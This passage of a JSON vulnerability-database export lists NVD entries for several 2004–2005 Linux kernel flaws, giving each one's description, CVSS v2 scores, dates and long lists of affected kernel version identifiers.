"cpe:2.3:o:linux:linux_kernel:2.6.13.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.14.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.1:rc2:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.8:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.11.11:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.14.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.0:test4:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.12.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.7:rc1:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.12:rc1:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.0:test1:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.14:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.12.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.0:test10:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.14:rc2:*:*:*:*:*:*"]}, {"lastseen": "2020-10-03T11:33:41", "description": "A numeric casting discrepancy in sdla_xfer in Linux kernel 2.6.x up to 2.6.5 and 2.4 up to 2.4.29-rc1 allows local users to read portions of kernel memory via a large len argument, which is received as an int but cast to a short, which prevents a read loop from filling a buffer.", "edition": 3, "cvss3": {}, "published": "2004-12-31T05:00:00", "title": "CVE-2004-2607", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2004-2607"], "modified": "2010-04-02T04:50:00", "cpe": ["cpe:/o:linux:linux_kernel:2.4.27", "cpe:/o:linux:linux_kernel:2.6.4", "cpe:/o:linux:linux_kernel:2.4.21", "cpe:/o:linux:linux_kernel:2.4.24_ow1", "cpe:/o:linux:linux_kernel:2.6.1", "cpe:/o:linux:linux_kernel:2.4.26", "cpe:/o:linux:linux_kernel:2.4.23_ow2", "cpe:/o:linux:linux_kernel:2.4.25", "cpe:/o:linux:linux_kernel:2.6.3", "cpe:/o:linux:linux_kernel:2.4.22", "cpe:/o:linux:linux_kernel:2.4.18", "cpe:/o:linux:linux_kernel:2.6.5", "cpe:/o:linux:linux_kernel:2.6.0", "cpe:/o:linux:linux_kernel:2.6.2", "cpe:/o:linux:linux_kernel:2.4.23", "cpe:/o:linux:linux_kernel:2.4.0", "cpe:/o:linux:linux_kernel:2.4.28", "cpe:/o:linux:linux_kernel:2.4.19", "cpe:/o:linux:linux_kernel:2.4.29", "cpe:/o:linux:linux_kernel:2.4.24"], "id": "CVE-2004-2607", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-2607", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:o:linux:linux_kernel:2.4.0:test12:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.0:test2:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.0:test11:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.24_ow1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.27:pre3:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.25:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.27:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.27:pre4:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.0:test8:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.23_ow2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.19:pre2:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.0:test9:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.0:test7:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.18:pre5:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.0:test10:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.23:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.29:rc1:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.18:pre8:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.0:test3:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.0:test6:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.22:pre10:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.19:pre4:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.24:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.0:test4:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.18:pre4:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.26:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.0:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.18:pre1:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.19:pre6:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.18:pre2:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.27:pre5:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.29:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.1:rc1:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.19:pre5:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.23:pre9:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.21:pre1:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.0:test5:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.19:pre1:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.18:pre6:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.21:pre4:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.1:rc2:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.18:pre7:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.0:test1:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.28:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.21:pre7:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.18:*:x86:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.27:pre1:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.18:pre3:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.19:pre3:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.27:pre2:*:*:*:*:*:*"]}, {"lastseen": "2020-10-03T11:34:57", "description": "The ptrace functionality (ptrace.c) in Linux kernel 2.6 before 2.6.14.2, using CLONE_THREAD, does not use the thread group ID to check whether it is attaching to itself, which allows local users to cause a denial of service (crash).", "edition": 3, "cvss3": {}, "published": "2005-11-23T21:03:00", "title": "CVE-2005-3783", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 4.9, "vectorString": "AV:L/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2005-3783"], "modified": "2018-10-19T15:39:00", "cpe": ["cpe:/o:linux:linux_kernel:2.6.4", "cpe:/o:linux:linux_kernel:2.6.11.7", "cpe:/o:linux:linux_kernel:2.6.11.8", "cpe:/o:linux:linux_kernel:2.6.12.3", "cpe:/o:linux:linux_kernel:2.6.14.1", "cpe:/o:linux:linux_kernel:2.6.12", "cpe:/o:linux:linux_kernel:2.6.8", "cpe:/o:linux:linux_kernel:2.6.1", "cpe:/o:linux:linux_kernel:2.6.14", "cpe:/o:linux:linux_kernel:2.6.11.2", "cpe:/o:linux:linux_kernel:2.6.11.11", "cpe:/o:linux:linux_kernel:2.6.13", "cpe:/o:linux:linux_kernel:2.6.11.9", "cpe:/o:linux:linux_kernel:2.6.3", "cpe:/o:linux:linux_kernel:2.6.11.10", "cpe:/o:linux:linux_kernel:2.6.6", "cpe:/o:linux:linux_kernel:2.6.12.1", "cpe:/o:linux:linux_kernel:2.6.5", "cpe:/o:linux:linux_kernel:2.6.0", "cpe:/o:linux:linux_kernel:2.6.2", "cpe:/o:linux:linux_kernel:2.6.9", "cpe:/o:linux:linux_kernel:2.6.10", "cpe:/o:linux:linux_kernel:2.6.11.12", "cpe:/o:linux:linux_kernel:2.6.11", "cpe:/o:linux:linux_kernel:2.6.11.6", "cpe:/o:linux:linux_kernel:2.6.11.4", "cpe:/o:linux:linux_kernel:2.6.12.4", "cpe:/o:linux:linux_kernel:2.6.7", "cpe:/o:linux:linux_kernel:2.6.11.1", "cpe:/o:linux:linux_kernel:2.6.8.1", "cpe:/o:linux:linux_kernel:2.6.11.5", "cpe:/o:linux:linux_kernel:2.6.11.3", "cpe:/o:linux:linux_kernel:2.6.12.2"], "id": "CVE-2005-3783", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-3783", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:C"}, "cpe23": ["cpe:2.3:o:linux:linux_kernel:2.6.11.10:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.13:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.14:rc3:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.11.12:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.11.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.8.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.11.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.12.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.12.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.10:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.0:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.11:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.11.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.14:rc4:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.11.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.14:rc1:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.9:2.6.20:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.12:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.11.8:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.11.9:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.11.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.8:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.11.11:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.14.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.12.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.11.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.14:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.12.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.11.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.14:rc2:*:*:*:*:*:*"]}, {"lastseen": "2020-10-03T11:34:56", "description": "The VT implementation (vt_ioctl.c) in Linux kernel 2.6.12, and possibly other versions including 2.6.14.4, allows local users to use the KDSKBSENT ioctl on terminals of other users and gain privileges, as demonstrated by modifying key bindings using loadkeys.", "edition": 3, "cvss3": {}, "published": "2005-10-18T22:02:00", "title": "CVE-2005-3257", "type": "cve", "cwe": ["CWE-264"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": true}, "cvelist": ["CVE-2005-3257"], "modified": "2018-10-03T21:31:00", "cpe": ["cpe:/o:linux:linux_kernel:2.6.14.4", "cpe:/o:linux:linux_kernel:2.6.12"], "id": "CVE-2005-3257", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-3257", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:linux:linux_kernel:2.6.14.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.12:*:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T19:22:21", "description": "The sysctl functionality (sysctl.c) in Linux kernel before 2.6.14.1 allows local users to cause a denial of service (kernel oops) and possibly execute code by opening an interface file in /proc/sys/net/ipv4/conf/, waiting until the interface is unregistered, then obtaining and modifying function pointers in memory that was used for the ctl_table.", "edition": 5, "cvss3": {}, "published": "2005-11-20T22:03:00", "title": "CVE-2005-2709", "type": "cve", "cwe": ["CWE-399"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": true}, "cvelist": ["CVE-2005-2709"], "modified": "2018-10-19T15:33:00", "cpe": ["cpe:/o:linux:linux_kernel:2.4.27", "cpe:/o:linux:linux_kernel:2.4.36.8", "cpe:/o:linux:linux_kernel:2.4.34.6", "cpe:/o:linux:linux_kernel:2.4.9", "cpe:/o:linux:linux_kernel:2.4.21", "cpe:/o:linux:linux_kernel:2.6.11.7", "cpe:/o:linux:linux_kernel:2.6.11.8", "cpe:/o:linux:linux_kernel:2.4.34.4", "cpe:/o:linux:linux_kernel:2.4.34.3", "cpe:/o:linux:linux_kernel:2.6.12.3", "cpe:/o:linux:linux_kernel:2.4.11", "cpe:/o:linux:linux_kernel:2.4.5", "cpe:/o:linux:linux_kernel:2.4.33.3", "cpe:/o:linux:linux_kernel:2.6.12", "cpe:/o:linux:linux_kernel:2.6.1", "cpe:/o:linux:linux_kernel:2.4.37.6", "cpe:/o:linux:linux_kernel:2.4.20", "cpe:/o:linux:linux_kernel:2.4.14", "cpe:/o:linux:linux_kernel:2.4.34.5", "cpe:/o:linux:linux_kernel:2.4.36.4", "cpe:/o:linux:linux_kernel:2.6.14", "cpe:/o:linux:linux_kernel:2.6.11.2", "cpe:/o:linux:linux_kernel:2.6.11.11", "cpe:/o:linux:linux_kernel:2.4.35.3", "cpe:/o:linux:linux_kernel:2.6.12.5", "cpe:/o:linux:linux_kernel:2.4.36.6", "cpe:/o:linux:linux_kernel:2.4.26", "cpe:/o:linux:linux_kernel:2.4.35.1", "cpe:/o:linux:linux_kernel:2.6.13", "cpe:/o:linux:linux_kernel:2.4.25", "cpe:/o:linux:linux_kernel:2.6.11.9", "cpe:/o:linux:linux_kernel:2.4.8", "cpe:/o:linux:linux_kernel:2.4.36.7", "cpe:/o:linux:linux_kernel:2.4.36.2", "cpe:/o:linux:linux_kernel:2.4.7", "cpe:/o:linux:linux_kernel:2.4.34", "cpe:/o:linux:linux_kernel:2.4.2", "cpe:/o:linux:linux_kernel:2.4.37.5", "cpe:/o:linux:linux_kernel:2.4.22", "cpe:/o:linux:linux_kernel:2.6.11.10", "cpe:/o:linux:linux_kernel:2.4.33.7", "cpe:/o:linux:linux_kernel:2.4.18", "cpe:/o:linux:linux_kernel:2.4.30", "cpe:/o:linux:linux_kernel:2.6.12.1", "cpe:/o:linux:linux_kernel:2.4.36.9", "cpe:/o:linux:linux_kernel:2.4.16", "cpe:/o:linux:linux_kernel:2.4.4", "cpe:/o:linux:linux_kernel:2.4.33.5", "cpe:/o:linux:linux_kernel:2.4.35.2", "cpe:/o:linux:linux_kernel:2.6.0", "cpe:/o:linux:linux_kernel:2.4.33.2", "cpe:/o:linux:linux_kernel:2.6.13.2", "cpe:/o:linux:linux_kernel:2.4.23", "cpe:/o:linux:linux_kernel:2.6.13.5", "cpe:/o:linux:linux_kernel:2.4.12", "cpe:/o:linux:linux_kernel:2.6.10", "cpe:/o:linux:linux_kernel:2.6.11.12", "cpe:/o:linux:linux_kernel:2.6.11", "cpe:/o:linux:linux_kernel:2.4.37", "cpe:/o:linux:linux_kernel:2.4.36", "cpe:/o:linux:linux_kernel:2.4.13", "cpe:/o:linux:linux_kernel:2.6.11.6", "cpe:/o:linux:linux_kernel:2.4.31", "cpe:/o:linux:linux_kernel:2.4.28", "cpe:/o:linux:linux_kernel:2.4.37.3", "cpe:/o:linux:linux_kernel:2.4.6", "cpe:/o:linux:linux_kernel:2.4.10", "cpe:/o:linux:linux_kernel:2.4.37.1", "cpe:/o:linux:linux_kernel:2.4.36.3", "cpe:/o:linux:linux_kernel:2.6.13.4", "cpe:/o:linux:linux_kernel:2.6.11.4", "cpe:/o:linux:linux_kernel:2.6.12.4", "cpe:/o:linux:linux_kernel:2.4.35.4", "cpe:/o:linux:linux_kernel:2.4.19", "cpe:/o:linux:linux_kernel:2.4.35.5", "cpe:/o:linux:linux_kernel:2.6.11.1", "cpe:/o:linux:linux_kernel:2.4.33.4", "cpe:/o:linux:linux_kernel:2.4.37.2", "cpe:/o:linux:linux_kernel:2.4.36.5", "cpe:/o:linux:linux_kernel:2.4.37.4", "cpe:/o:linux:linux_kernel:2.6.11.5", "cpe:/o:linux:linux_kernel:2.6.12.6", "cpe:/o:linux:linux_kernel:2.4.3", "cpe:/o:linux:linux_kernel:2.4.32", "cpe:/o:linux:linux_kernel:2.4.17", "cpe:/o:linux:linux_kernel:2.4.1", "cpe:/o:linux:linux_kernel:2.6.13.1", "cpe:/o:linux:linux_kernel:2.4.34.2", "cpe:/o:linux:linux_kernel:2.4.15", "cpe:/o:linux:linux_kernel:2.6.11.3", "cpe:/o:linux:linux_kernel:2.4.34.1", "cpe:/o:linux:linux_kernel:2.6.12.2", "cpe:/o:linux:linux_kernel:2.2.27", "cpe:/o:linux:linux_kernel:2.4.33", "cpe:/o:linux:linux_kernel:2.6.13.3", "cpe:/o:linux:linux_kernel:2.4.29", "cpe:/o:linux:linux_kernel:2.4.24", "cpe:/o:linux:linux_kernel:2.4.33.1", "cpe:/o:linux:linux_kernel:2.4.36.1"], "id": "CVE-2005-2709", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-2709", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:linux:linux_kernel:2.4.24:*:-ow1:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.34:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.11.10:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.27:*:-pre5:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.15:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.12.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.36.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.27:*:-pre4:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.36.8:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.37:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.37.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.18:*:pre-7:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.21:*:-pre1:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.37.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.35.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.10:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.18:*:pre-4:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.13:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.25:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.27:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.2.27:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.35.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.35.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.36.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.36.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.34.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.18:*:pre-8:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.11.12:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.36.9:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.13.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.23:*:-pre9:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.11.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.17:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.13.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.11.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.13.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.19:*:-pre4:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.33:p-re1:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.21:*:-pre4:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.23:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.29:-rc1:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.19:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.13.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.33.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.32:-pre1:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.36.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.21:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.12.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.36:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.13:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.37:-rc1:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.34.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.31:-pre1:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.12:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.34.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.18:*:pre-5:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.12.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.24:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.19:*:-pre6:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.10:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.32:-pre2:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.26:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.33.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.30:rc2:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.0:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.22:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.37.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.11:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.33.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.23:*:-ow2:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.11.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.11.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.34.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.19:*:-pre2:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.35.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.14:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.37.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.19:*:-pre5:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.27:*:-pre1:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.27:*:-pre3:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.36.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.36.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.12:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.37.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.29:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.18:*:pre-2:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.11.8:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.19:*:-pre3:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.1:*:*:*:*:*:*:*", 